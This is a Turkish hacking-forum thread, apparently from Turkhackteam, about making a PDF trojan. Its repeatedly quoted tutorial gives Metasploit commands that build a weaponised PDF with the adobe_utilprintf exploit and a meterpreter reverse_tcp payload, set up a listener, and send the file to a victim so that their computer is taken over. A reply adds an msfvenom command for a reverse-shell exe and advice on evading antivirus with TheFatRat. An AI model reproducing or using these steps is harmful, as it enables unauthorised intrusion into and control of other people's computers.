.pdf Trojan Yapma

sw1ndler

Katılımcı Üye
29 Şub 2020
481
89
Adobe Reader'ın o sürümü açmazsa bir işe yaramaz. Ki o sürümü kullanan kaldı mı o da ayrı mesele. Şahsen ben .pdf'leri Google Chrome ile açıyorum. O yüzden çöp.. Siz sanırım filimlerdeki gibi zannediyorsunuz her şeyi, dosyayı gönder ve artık sistemdesin :D
çok haklısın fakat adobe readerın yeni sürümlerinde bir açık çıktı .ms settings gibi deep link exploiti birleştiriyordu çok sağlam bir şeydi fakat artık chrome exploitler kalmadı tek doc lar işe yarıyor gerisi işe yaramıyor
 

*Crasher

Katılımcı Üye
24 Eyl 2021
259
69
-Vietnam-
Merhaba , Ben NotBody . Bugün Metasploit üzerinden .pdf trojan nasıl yapılır onu anlatıcam bu benim ilk konum olsun. Umarım beğenirsiniz.
ilk önce metasploit toolumuzu açalım
Kod:
msfconsole
Şimdi uygun trojanı kullanmak için
Kod:
use exploit/windows/fileformat/adobe_utilprintf
komutunu kullanalım ardından
Kod:
show options
yazarak gerekli ayarları görebiliriz
pp3a3e9.png

Kod:
set FILENAME dosyadı.pdf
Komutu ile dosya adı belirliyoruz
Kod:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST İPADRESİNİZ
set LPORT 4444
Sonrasında
Kod:
exploit
yazarak dosyayı oluşturuyoruz ve
Kod:
cp /root/.msf4/local/dosyaadi.pdf /root
Komutu ile dosyayı root dizinine çıkartıyoruz son olarak yeni bir terminal açıp aşşağıdaki komutları sırasıyla giriyoruz
Kod:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ipadresiniz
set LPORT 4444
exploit
Pdfi karşı tarafa yollayın ve açmasını bekleyin açtığı zaman bilgisayarı elinize düşecektir :)
Çok İşe Yarar Bir Konu Olmuş, Elinize Sağlık.
 

free5

Yeni üye
28 Haz 2021
2
0
21
Merhaba , Ben NotBody . Bugün Metasploit üzerinden .pdf trojan nasıl yapılır onu anlatıcam bu benim ilk konum olsun. Umarım beğenirsiniz.
ilk önce metasploit toolumuzu açalım
Kod:
msfconsole
Şimdi uygun trojanı kullanmak için
Kod:
use exploit/windows/fileformat/adobe_utilprintf
komutunu kullanalım ardından
Kod:
show options
yazarak gerekli ayarları görebiliriz
pp3a3e9.png

Kod:
set FILENAME dosyadı.pdf
Komutu ile dosya adı belirliyoruz
Kod:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST İPADRESİNİZ
set LPORT 4444
Sonrasında
Kod:
exploit
yazarak dosyayı oluşturuyoruz ve
Kod:
cp /root/.msf4/local/dosyaadi.pdf /root
Komutu ile dosyayı root dizinine çıkartıyoruz son olarak yeni bir terminal açıp aşşağıdaki komutları sırasıyla giriyoruz
Kod:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ipadresiniz
set LPORT 4444
exploit
Pdfi karşı tarafa yollayın ve açmasını bekleyin açtığı zaman bilgisayarı elinize düşecektir :)
peki bunu exeden pdf çevirebilirmiyiz direk pdf yapmak yerine
 

xmajestar

Katılımcı Üye
13 Ocak 2021
484
43
tzdata-TR
eline sağlık fakat bu artık çalışmıyor msf buna güncelleme getirmedi o pdf sürümü eskidi şuan sadece apk ve php payloadları devrede metasploitin msf 7 de umarım upgrade yaparlar
 

NotBody

Yeni üye
14 Ağu 2021
22
11
21
eline sağlık fakat bu artık çalışmıyor msf buna güncelleme getirmedi o pdf sürümü eskidi şuan sadece apk ve php payloadları devrede metasploitin msf 7 de umarım upgrade yaparlar
Eski windows sürümlerinde çalışıyor olması lazım ama güncel sürümlerde işe yaramaz eklemeyi unutmuşum
 

NotBody

Yeni üye
14 Ağu 2021
22
11
21
peki bunu exeden pdf çevirebilirmiyiz direk pdf yapmak yerine
İlk önce
Kod:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.46 LPORT=4444 R > /root/Desktop/gta31.exe
kodu ile exe oluşturup bu dosyayı TheFatRat gibi toollarla fudlayabiliriz açıkcası genel olarak truva için msf kullanmadım ama yapılabilir.
 

NotBody

Yeni üye
14 Ağu 2021
22
11
21
Adobe Reader'ın o sürümü açmazsa bir işe yaramaz. Ki o sürümü kullanan kaldı mı o da ayrı mesele. Şahsen ben .pdf'leri Google Chrome ile açıyorum. O yüzden çöp.. Siz sanırım filimlerdeki gibi zannediyorsunuz her şeyi, dosyayı gönder ve artık sistemdesin :D
Açıkcası ben sadece yapmayı gösterdim bilmek istiyen gelir bakar, muhalefetle işim olmazzz.
 

ertan074

Yeni üye
13 May 2021
25
7
Merhaba , Ben NotBody . Bugün Metasploit üzerinden .pdf trojan nasıl yapılır onu anlatıcam bu benim ilk konum olsun. Umarım beğenirsiniz.
ilk önce metasploit toolumuzu açalım
Kod:
msfconsole
Şimdi uygun trojanı kullanmak için
Kod:
use exploit/windows/fileformat/adobe_utilprintf
komutunu kullanalım ardından
Kod:
show options
yazarak gerekli ayarları görebiliriz
pp3a3e9.png

Kod:
set FILENAME dosyadı.pdf
Komutu ile dosya adı belirliyoruz
Kod:
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST İPADRESİNİZ
set LPORT 4444
Sonrasında
Kod:
exploit
yazarak dosyayı oluşturuyoruz ve
Kod:
cp /root/.msf4/local/dosyaadi.pdf /root
Komutu ile dosyayı root dizinine çıkartıyoruz son olarak yeni bir terminal açıp aşşağıdaki komutları sırasıyla giriyoruz
Kod:
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST ipadresiniz
set LPORT 4444
exploit
Pdfi karşı tarafa yollayın ve açmasını bekleyin açtığı zaman bilgisayarı elinize düşecektir :)
Emeğin için Tşkler
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.